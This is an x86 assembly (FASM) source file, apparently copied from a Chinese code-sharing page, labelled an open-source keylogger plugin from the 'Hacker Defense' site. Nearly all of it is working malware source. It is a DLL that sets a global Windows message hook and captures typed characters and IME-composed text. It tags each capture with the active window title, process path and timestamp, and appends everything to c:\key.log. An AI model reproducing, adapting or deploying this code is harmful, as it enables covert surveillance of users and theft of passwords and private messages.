📄 hook.asm
字号:
;////////////////////////////////////////////////////////
; 黑客防线开源键盘记录插件Beta1.0
; 作者:小鱼
; 黑客防线 http://www.hacker.com.cn
;//////////////////////////////////////////////////////
format PE GUI 4.0 DLL
entry DllEntry
include 'win32ax.inc'
WM_IME_COMPOSITION equ 010Fh
GCS_RESULTSTR equ 0800h
KeyMaxSize equ 128
section '.data' data readable writeable
szString db 0dh, 0ah, ' [%02d/%02d/%d %02d:%02d:%02d] (%s----%s) --- ',0dh, 0ah,0
szEnter db 0dh,0ah,0
szKeyTemp db '[%s]',0
szKeyName db 30 dup (?)
szKeyBuffer db 36 dup (?)
hFocus rd 1
dwStrSize rd 1
section '.bss' data readable writeable shareable
hInstance rd 1
hHook rd 1
hImc rd 1
hWindow rd 1
hParent rd 1
dwLastTime rd 1
szTemp db 'c:\key.log', 0
szTitle db 50 dup (?)
szChar db 2 dup (?)
szShare db 200 dup (?)
section '.text' code readable executable
proc DllEntry hInstDLL, dwReason, lpReserved
push dword [ebp+8]
pop dword [hInstance]
sub eax, eax
inc eax
ret
endp
proc FileExist lpPath:DWORD
invoke GetFileAttributes, [lpPath]
cmp eax, 0FFFFFFFFh
je RetFaild
return 1
RetFaild:
return 0
endp
proc SaveInfo lpBuffer:DWORD
locals
SysTime SYSTEMTIME
dwProcessId dd ?
hProcess dd ?
@ProcessPath db 200 dup (?)
@szTitle db 200 dup (?)
@szBuffer db 1000 dup (?)
endl
invoke GetActiveWindow
cmp [hParent], eax
je @f
mov [hParent], eax
invoke GetWindowText, eax, addr @szTitle, 200
xor eax, eax
mov [dwProcessId], eax
invoke GetWindowThreadProcessId, [hParent], addr dwProcessId
invoke OpenProcess, PROCESS_QUERY_INFORMATION or PROCESS_VM_READ, FALSE, [dwProcessId]
or eax, eax
je @@3
mov [hProcess], eax
invoke GetModuleFileNameEx, [hProcess], NULL, addr @ProcessPath, 200
or eax, eax
je @@3
invoke GetLocalTime, addr SysTime
invoke RtlZeroMemory, addr @szBuffer, 1000
invoke wsprintf, addr @szBuffer, szString, w2d [SysTime.wMonth], \
w2d [SysTime.wDay], w2d [SysTime.wYear], w2d [SysTime.wHour],\
w2d [SysTime.wMinute], w2d [SysTime.wSecond], addr @szTitle, addr @ProcessPath
stdcall SaveInfo, addr @szBuffer ;递归使其将堆栈中的数据写入
@@:
stdcall SaveToFile, dword [ebp+8]
or eax, eax
je @f
return TRUE
@@3:
invoke MessageBox, NULL, '查询进程信息失败..', '提示', MB_OK
@@0:
return FALSE
endp
;
;
;
proc SaveToFile lpBuffer:DWORD
locals
@hFile dd ?
@lpByteWrite dd ?
@dwFileSize dd ?
endl
stdcall FileExist, szTemp
or eax, eax
jne @f
invoke CreateFile, szTemp, GENERIC_WRITE, FILE_SHARE_WRITE, NULL,\
CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
cmp eax, -1
je @@2
mov [@hFile], eax
jmp @@1
@@:
invoke CreateFile, szTemp, GENERIC_WRITE, FILE_SHARE_WRITE, NULL,\
OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
cmp eax, -1
je @@2
mov [@hFile], eax
@@1:
xor eax, eax
mov dword [@dwFileSize], eax
invoke lstrlen, [lpBuffer]
mov [@dwFileSize], eax
invoke SetFilePointer, [@hFile], 0, 0, FILE_END
invoke WriteFile, [@hFile], [lpBuffer], [@dwFileSize], addr @lpByteWrite, NULL
or eax, eax
je @f
invoke CloseHandle, [@hFile]
RetTrue:
return TRUE
@@2:
invoke MessageBox, NULL, '创建失败...', '提示', MB_OK
return FALSE
@@:
invoke MessageBox, NULL, '写入失败...', '提示', MB_OK
return FALSE
endp
;
; CALLBACK HookProc
;
proc HookProc dwCode:DWORD, wParam:DWORD, lParam:DWORD
locals
dwResult dd ?
dwlParam dd ?
endl
push edx esi edi
invoke CallNextHookEx, [hHook], [dwCode], [wParam], [lParam]
mov dword [dwResult], eax
mov edx, [lParam]
virtual at edx
@hWnd dd ?
@MSG dd ?
@wParam dd ?
@lParam dd ?
@dwTime dd ?
@dwpt dd ?
end virtual
push dword [@lParam]
pop dword [dwlParam]
cmp [@MSG], WM_CHAR
je __HookChar
cmp [@MSG], WM_IME_COMPOSITION
je __HookImeChar
jmp __HookEnd
__HookChar:
mov eax, dword [@dwTime]
cmp [dwLastTime], eax
je __HookEnd
push [@dwTime]
pop [dwLastTime]
cmp [@wParam], 80h
jg @f
cmp [@wParam], 14h
jl @f
xor eax, eax
mov dword [szChar], eax
push dword [@wParam]
pop dword [szChar]
stdcall SaveInfo, szChar
jmp __HookEnd
@@:
cmp [@wParam], 0dh
jne @f
stdcall SaveInfo, szEnter
jmp __HookEnd
@@:
_SaveKeyName:
invoke RtlZeroMemory, szKeyName, 30
invoke GetKeyNameText,[dwlParam], szKeyName, 28
cmp eax, 0
jle __HookEnd
invoke RtlZeroMemory, szKeyBuffer, 36
invoke wsprintf, szKeyBuffer, szKeyTemp, szKeyName
add esp, 3*4
stdcall SaveInfo, szKeyBuffer
jmp __HookEnd
__HookImeChar:
mov eax, dword [@dwTime] ;通过投递时间判断消息重复.....
cmp [dwLastTime], eax
je __HookEnd
push [@dwTime]
pop [dwLastTime]
invoke GetFocus
mov [hFocus], eax
invoke ImmGetContext, [hFocus]
or eax, eax
je __HookEnd
mov [hImc], eax
invoke ImmGetCompositionString, [hImc], GCS_RESULTSTR, 0, 0
or eax, eax
je __HookEnd
mov [dwStrSize], eax
inc [dwStrSize]
inc [dwStrSize]
invoke RtlZeroMemory, szShare, 200
invoke ImmGetCompositionString, [hImc], GCS_RESULTSTR, szShare, [dwStrSize]
stdcall SaveInfo, szShare
invoke ImmReleaseContext, [hFocus], [hImc]
xor eax, eax
mov [hImc], eax
mov [hFocus], eax
__HookEnd:
pop edi esi edx
return [dwResult]
endp
;
; InstallHook Proc
;
proc StartHook
cmp [hHook], 0 ; Prevention Repeat Set
je @f
return
@@:
invoke SetWindowsHookEx, WH_GETMESSAGE, HookProc,\
[hInstance], NULL
mov [hHook], eax
return
endp
;
; UnInstallHook Proc
;
proc StopHook
invoke UnhookWindowsHookEx, [hHook]
xor eax, eax
mov [hHook], eax
return
endp
section '.idata' data readable writeable import
library user32, 'user32.dll',\
kernel32, 'kernel32.dll',\
imm32, 'imm32.dll',\
Psapi, 'Psapi.dll'
include 'api\kernel32.inc'
include 'api\user32.inc'
import imm32,\
ImmGetContext, 'ImmGetContext',\
ImmReleaseContext, 'ImmReleaseContext',\
ImmGetCompositionString, 'ImmGetCompositionStringA'
import Psapi,\
GetModuleFileNameEx, 'GetModuleFileNameExA'
section '.rdata' data readable writeable export
export 'hook.dll',\
StartHook, 'StartHook',\
StopHook, 'StopHook'
section '.reloc' data readable fixups
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -